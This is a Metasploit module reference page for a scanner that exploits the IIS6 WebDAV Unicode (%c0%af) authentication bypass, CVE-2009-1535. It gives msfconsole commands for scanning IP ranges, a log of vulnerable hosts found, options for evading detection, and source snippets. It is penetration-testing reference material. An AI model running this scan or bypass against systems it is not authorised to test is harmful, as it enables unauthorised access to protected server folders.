MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/dir_webdav_unicode_bypass metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
Module: auxiliary/scanner/http/dir_webdav_unicode_bypass
Source code: modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb
Disclosure date: -
Last modification time: 2021-01-28 10:35:25 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2009-1122, CVE-2009-1535

This module is based on et's HTTP Directory Scanner module, with one exception. Where authentication is required, it attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(dir_webdav_unicode_bypass) > show options
    ... show and set options ...
msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS ip-range
msf auxiliary(dir_webdav_unicode_bypass) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a /protected/ initial pathname component to bypass the password protection on the protected folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122. More info about this vulnerability can be found in CVE-2009-1535.

Verification Steps


  1. Do: use auxiliary/scanner/http/dir_webdav_unicode_bypass
  2. Do: set RHOSTS [IP]
  3. Do: set THREADS [number of threads]
  4. Do: run

Scenarios


msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(dir_webdav_unicode_bypass) > set THREADS 20
THREADS => 20
msf auxiliary(dir_webdav_unicode_bypass) > run

[*] Using code '404' as not found.
[*] Using code '404' as not found.
[*] Using code '404' as not found.
[*] Found protected folder http://192.168.1.211:80/admin/ 401 (192.168.1.211)
[*]     Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.223:80/phpmyadmin/ 401 (192.168.1.223)
[*]     Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.223:80/security/ 401 (192.168.1.223)
[*]     Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*] Found protected folder http://192.168.1.204:80/printers/ 401 (192.168.1.204)
[*]     Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*]     Found vulnerable WebDAV Unicode bypass target http://192.168.1.204:80/%c0%afprinters/ 207 (192.168.1.204)
[*] Found protected folder http://192.168.1.203:80/printers/ 401 (192.168.1.203)
[*]     Testing for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.
[*]     Found vulnerable WebDAV Unicode bypass target http://192.168.1.203:80/%c0%afprinters/ 207 (192.168.1.203)
...snip...
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_webdav_unicode_bypass) >

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/dir_webdav_unicode_bypass auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/dir_webdav_unicode_bypass

msf6 auxiliary(scanner/http/dir_webdav_unicode_bypass) > show info

       Name: MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
     Module: auxiliary/scanner/http/dir_webdav_unicode_bypass
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  aushack <[email protected]>

Check supported:
  No

Basic options:
  Name        Current Setting                                                       Required  Description
  ----        ---------------                                                       --------  -----------
  DICTIONARY  /opt/metasploit-framework/embedded/framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
  ERROR_CODE  404                                                                   yes       Error code for non existent directory
  HTTP404S    /opt/metasploit-framework/embedded/framework/data/wmap/wmap_404s.txt  no        Path of 404 signatures to use
  PATH        /                                                                     yes       The path to identify files
  Proxies                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT       80                                                                    yes       The target port (TCP)
  SSL         false                                                                 no        Negotiate SSL/TLS for outgoing connections
  THREADS     1                                                                     yes       The number of concurrent threads (max one per host)
  VHOST                                                                             no        HTTP server virtual host

Description:
  This module is based on et's HTTP Directory Scanner module, with one 
  exception. Where authentication is required, it attempts to bypass 
  authentication using the WebDAV IIS6 Unicode vulnerability 
  discovered by Kingcope. The vulnerability appears to be exploitable 
  where WebDAV is enabled on the IIS6 server, and any protected folder 
  requires either Basic, Digest or NTLM authentication.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2009/MS09-020
  https://nvd.nist.gov/vuln/detail/CVE-2009-1535
  https://nvd.nist.gov/vuln/detail/CVE-2009-1122
  OSVDB (54555)
  http://www.securityfocus.com/bid/34993

Module Options


This is a complete list of options available in the scanner/http/dir_webdav_unicode_bypass auxiliary module:

msf6 auxiliary(scanner/http/dir_webdav_unicode_bypass) > show options

Module options (auxiliary/scanner/http/dir_webdav_unicode_bypass):

   Name        Current Setting                                                       Required  Description
   ----        ---------------                                                       --------  -----------
   DICTIONARY  /opt/metasploit-framework/embedded/framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   ERROR_CODE  404                                                                   yes       Error code for non existent directory
   HTTP404S    /opt/metasploit-framework/embedded/framework/data/wmap/wmap_404s.txt  no        Path of 404 signatures to use
   PATH        /                                                                     yes       The path to identify files
   Proxies                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80                                                                    yes       The target port (TCP)
   SSL         false                                                                 no        Negotiate SSL/TLS for outgoing connections
   THREADS     1                                                                     yes       The number of concurrent threads (max one per host)
   VHOST                                                                             no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/dir_webdav_unicode_bypass auxiliary module:

msf6 auxiliary(scanner/http/dir_webdav_unicode_bypass) > show advanced

Module advanced options (auxiliary/scanner/http/dir_webdav_unicode_bypass):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   NoDetailMessages      true                                                no        Do not display detailed test messages
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/dir_webdav_unicode_bypass module can do:

msf6 auxiliary(scanner/http/dir_webdav_unicode_bypass) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/dir_webdav_unicode_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/dir_webdav_unicode_bypass) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

ERROR_CODE


Here is a relevant code snippet related to the "ERROR_CODE" error message:

34:	        ]))
35:	
36:	    register_options(
37:	      [
38:	        OptString.new('PATH', [ true,  "The path to identify files", '/']),
39:	        OptInt.new('ERROR_CODE', [ true, "Error code for non existent directory", 404]),
40:	        OptPath.new('DICTIONARY',   [ false, "Path of word dictionary to use",
41:	            File.join(Msf::Config.data_directory, "wmap", "wmap_dirs.txt")
42:	          ]
43:	        ),
44:	        OptPath.new('HTTP404S',   [ false, "Path of 404 signatures to use",

ERROR_CODE


Here is a relevant code snippet related to the "ERROR_CODE" error message:

62:	    tpath = normalize_uri(datastore['PATH'])
63:	    if tpath[-1,1] != '/'
64:	      tpath += '/'
65:	    end
66:	
67:	    ecode = datastore['ERROR_CODE'].to_i
68:	    vhost = datastore['VHOST'] || wmap_target_host
69:	    prot  = datastore['SSL'] ? 'https' : 'http'
70:	
71:	
72:	    #

Using code '<ECODE>' as not found.


Here is a relevant code snippet related to the "Using code '<ECODE>' as not found." error message:

101:	        else
102:	          print_status("Using custom 404 string of '#{emesg}'")
103:	        end
104:	      else
105:	        ecode = tcode
106:	        print_status("Using code '#{ecode}' as not found.")
107:	      end
108:	
109:	
110:	    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
111:	      conn = false

NOT Found <WMAP_BASE_URL><TPATH><TESTFDIR> <RES.CODE> (<WMAP_TARGET_HOST>)


Here is a relevant code snippet related to the "NOT Found <WMAP_BASE_URL><TPATH><TESTFDIR> <RES.CODE> (<WMAP_TARGET_HOST>)" error message:

132:	        }, 20)
133:	
134:	
135:	        if(not res or ((res.code.to_i == ecode) or (emesg and res.body.index(emesg))))
136:	          if !datastore['NoDetailMessages']
137:	            print_status("NOT Found #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
138:	          end
139:	        elsif (res.code.to_i == 401)
140:	          print_status("Found protected folder #{wmap_base_url}#{tpath}#{testfdir} #{res.code} (#{wmap_target_host})")
141:	          print_status("\tTesting for unicode bypass in IIS6 with WebDAV enabled using PROPFIND request.")
142:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • aushack

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.